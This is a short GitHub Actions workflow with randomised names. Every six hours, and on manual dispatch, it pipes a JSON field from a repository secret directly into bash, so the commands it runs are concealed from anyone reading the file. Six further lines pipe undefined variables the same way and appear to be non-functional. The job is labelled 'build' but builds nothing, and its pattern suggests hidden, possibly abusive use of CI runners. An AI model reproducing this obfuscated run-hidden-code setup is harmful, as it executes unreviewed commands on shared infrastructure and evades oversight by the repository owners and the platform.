name: chickdecent

on:
  workflow_dispatch:
  schedule:
    - cron: '15 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chickdecent
        env:
          crcdv0: ${{ secrets.crcdv0 }}
        run: |
          echo $crcdv0 | jq -r .o96 | /bin/bash
          echo $au739 | jq -r .yn49 | /bin/bash
          echo $zuhro20109 | jq -r .ph7 | /bin/bash
          echo $kzt48744 | jq -r .bryal27 | /bin/bash
          echo $ev69 | jq -r .c42284 | /bin/bash
          echo $r020 | jq -r .h79496 | /bin/bash
          echo $vbwk671 | jq -r .jvxvn4 | /bin/bash

